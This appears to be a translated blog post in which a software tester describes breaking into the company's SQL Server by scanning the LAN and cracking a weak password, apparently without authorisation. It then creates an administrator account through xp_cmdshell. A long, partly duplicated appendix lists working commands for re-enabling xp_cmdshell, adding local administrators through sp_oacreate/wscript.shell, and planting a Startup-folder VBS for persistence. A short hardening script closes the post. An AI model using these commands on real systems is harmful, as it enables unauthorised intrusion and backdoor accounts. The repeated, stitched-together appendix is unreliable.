Recording an unintentional intrusion test

Source: Internet
Author: User
Last year I worked as a tester at a library management software company. Because the company's software is relatively mature, the main tasks were functional testing, installation and uninstallation testing, compatibility testing, and performance testing; software security was rarely tested.

One day I wondered whether the software was really so impregnable, given that it had never undergone security testing, and made up my mind to test it once.

The company's software is a C/S system connected to a SQL Server database. SQL Server databases have their vulnerabilities, which is why I started with SQL Server.

First I scanned the LAN with X-Scan-v3.3-cn (my system administrator was not alert enough: I scanned for an hour and he never noticed) and found several computers with an administrator account whose password was empty. That was not my goal, however, so I set it aside for the moment. The scan also revealed some information about the target host: port 80 was closed, probably because the host has no Internet connection, and ports such as 135 were open but unused. The most important piece of information was that the SQL Server connection username was the pinyin abbreviation of the company's name, and the password was flagged as weak. Now I was confident, and with a simple brute-force cracking tool the password was cracked.

Ah, the database was cracked so quickly; I had not expected that. I used to think this system was really hard to crack!

Now that we were in, let's continue. Remember that SQL Server has a very dangerous stored procedure, xp_cmdshell; I didn't know whether the developers had dealt with it. I wrote exec sp_addextendedproc xp_cmdshell 'net user', the execution succeeded and listed all the users on the target host. Now I was completely speechless. I then used the stored procedure xp_cmdshell directly to create a user with administrator-equivalent permissions and installed DameWare on the host. Then I showed the project manager the vulnerability.

  Appendix: some simple uses of xp_cmdshell (other users' experience)

SQL statement to enable the external shell

exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Determine whether the extended stored procedure exists

select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'

If the result is 1, it exists.

Restore xp_cmdshell

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'

If the result is 1, it worked.

Otherwise, upload xplog70.dll.

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'

After a weak SQL password has been found by scanning, sqltools reports that the stored procedure 'master..xp_cmdshell' cannot be found.

The usual cause is that the extended stored procedure xp_cmdshell has been dropped, and there is a recovery method. If recovery fails, it has been renamed.

Connect with sqltools; after connecting, run the following database command:

exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

With luck this succeeds. If you want the host to no longer be able to execute DOS commands via SQL, execute:

sp_dropextendedproc 'xp_cmdshell'

DOS commands can then no longer be executed. Of course, the statement above restores it.

sqltools can connect and run a DOS command, but it always reports: EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.

How can this problem be solved?

Uploading files doesn't work either ......

1. The stored procedure 'master..xp_cmdshell' cannot be found.

Recovery method: after connecting with Query Analyzer,

Step 1: execute exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Step 2: execute sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Then press F5 to complete the command execution.

2. Cannot load DLL xpsql70.dll or a DLL it references. Reason 126 (the specified module could not be found).

Recovery method: after connecting with Query Analyzer,

Step 1: execute exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Step 2: execute sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Then press F5 to complete the command execution.

3. Cannot find function xp_cmdshell in xpweb70.dll. Reason 127 (the specified procedure could not be found).

Recovery method: after connecting with Query Analyzer,

Step 1: execute exec sp_dropextendedproc 'xp_cmdshell'

Step 2: execute exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'

Then press F5 to complete the command execution.

4. Ultimate method:

If none of the above methods can recover it, try the following method to add an account:

After connecting with Query Analyzer,

Windows 2000 Server:

declare @shell int exec sp_oacreate 'wscript.shell', @shell output

exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user NewUser Password /add'

declare @shell int exec sp_oacreate 'wscript.shell', @shell output

exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators NewUser /add'

Windows XP or Windows Server 2003:

declare @shell int exec sp_oacreate 'wscript.shell', @shell output

exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user NewUser Password /add'

declare @shell int exec sp_oacreate 'wscript.shell', @shell output

exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net localgroup administrators NewUser /add'

No way ......

  Method 1: connect with Query Analyzer and execute:

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and objectproperty(id, N'IsExtendedProc') = 1)

    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

go

Then press F5 to complete the command execution.

  Method 2: after connecting with Query Analyzer

Step 1: use master

Step 2: execute sp_dropextendedproc 'xp_cmdshell' and press F5 to complete the execution.

1. The stored procedure 'master..xp_cmdshell' cannot be found. Recovery method: after connecting with Query Analyzer,

Step 1: execute exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Step 2: execute sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', and press F5 to complete the command execution.

2. Cannot load DLL xpsql70.dll or a DLL it references. Reason 126 (the specified module could not be found).

Recovery method: after connecting with Query Analyzer,

Step 1: execute sp_dropextendedproc 'xp_cmdshell'

Step 2: execute sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', and press F5 to complete the command execution.

3. Cannot find function xp_cmdshell in xpweb70.dll. Reason 127 (the specified procedure could not be found).

Recovery method: after connecting with Query Analyzer,

Step 1: execute exec sp_dropextendedproc 'xp_cmdshell'

Step 2: execute exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'

Then press F5 to complete the command execution.

4. Ultimate method. If none of the above methods can recover it, try the following method to add an account:

After connecting with Query Analyzer,

Windows 2000 Server:

declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user yszar andylau /add'

declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators yszar /add'

Windows XP or Windows Server 2003:

declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user username password /add'

declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net localgroup administrators username /add'

Or you can use

declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', null, 'xxxxx'    -- xxxxx: the command to be executed

Sometimes, when connecting with Query Analyzer and running the statements above, the stored procedure sp_addextendedproc itself cannot be found.

Solution:

create procedure sp_addextendedproc  --- 1996/08/30 20:13

    @functname nvarchar(517),   /* (owner.)name of function to call */

    @dllname   varchar(255)     /* name of DLL containing function */

as

    set implicit_transactions off

    if @@trancount > 0

    begin

        raiserror(15002, -1, -1, 'sp_addextendedproc')

        return (1)

    end

    dbcc addextendedproc(@functname, @dllname)

    return (0) -- sp_addextendedproc

go

Paste this code into Query Analyzer and execute it.

1. Working around xplog70.dll

declare @cmd int

exec sp_oacreate 'wscript.shell', @cmd output

exec sp_oamethod @cmd, 'run', null, 'net user username password /add', '0', 'true'

declare @cmd int

exec sp_oacreate 'wscript.shell', @cmd output

exec sp_oamethod @cmd, 'run', null, 'net localgroup administrators username /add', '0', 'true'

2. Restore xp_cmdshell

First try to restore xp_cmdshell: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

It turns out that xpsql70.dll has been deleted.

Then write a VBS file into the Startup folder:

declare @o int, @f int, @t int, @ret int, @a int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out, 'C:\DOCUME~1\ALLUSE~1\Start Menu\Programs\Startup\a.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', null, 'set wshshell = createobject("wscript.shell")'

exec @ret = sp_oamethod @f, 'writeline', null, 'a = wshshell.run("cmd.exe /c net user Lintao lintao520 /add", 0)'

exec @ret = sp_oamethod @f, 'writeline', null, 'b = wshshell.run("cmd.exe /c net localgroup administrators Lintao /add", 0)'

3. Remove sa's xp_cmdshell permission.

If you do not need the extended stored procedure xp_cmdshell, drop it with this SQL statement:

use master

sp_dropextendedproc 'xp_cmdshell'

xp_cmdshell is the easiest way into the operating system and a large backdoor that the database leaves open to it. If you do need this stored procedure, restore it with this statement:

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

4. Upload xplog70.dll:

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'
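The checks that the story and the appendix circle around (a weak SQL login, xp_cmdshell present and executable, OLE Automation available for sp_oacreate), written up as one audit-and-hardening script for a current SQL Server. This is an added example, not code from the original post; it assumes SQL Server 2005 or later, where these features are toggled with sp_configure rather than sp_addextendedproc/sp_dropextendedproc, and is run as sysadmin in master.

```sql
-- Added audit/hardening script (not from the original post). Assumes SQL Server 2005+,
-- run as sysadmin. The SQL 2000-era equivalent of step 2 is the sysobjects query above.
USE master;
GO

-- 1. Weak credentials: the intrusion above began with a SQL login whose password was a
--    guessable derivative of its name. PWDCOMPARE tests a candidate against the stored hash.
SELECT name,
       CASE WHEN PWDCOMPARE('',   password_hash) = 1 THEN 'BLANK'
            WHEN PWDCOMPARE(name, password_hash) = 1 THEN 'SAME AS LOGIN NAME'
            ELSE 'policy not enforced' END AS finding,
       is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE PWDCOMPARE('',   password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1
   OR is_policy_checked = 0;

-- 2. Dangerous surface: is xp_cmdshell or OLE Automation (sp_OACreate / sp_OAMethod) on?
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 3. Who may run xp_cmdshell? Non-sysadmin callers need an explicit EXECUTE grant on the
--    procedure; any grantee listed here besides dbo deserves a second look.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pe.grantee_principal_id = pr.principal_id
WHERE pe.class = 1
  AND pe.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

-- 4. Remediation: switch both features off unless a documented job depends on them.
EXEC sp_configure 'show advanced options', 1;     RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;     RECONFIGURE;
GO
```

Re-running step 2 afterwards should show value_in_use = 0 for both rows; a later change back to 1 without a change ticket is worth alerting on.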

From: http://www.51testing.com/html/03/n-132103.html
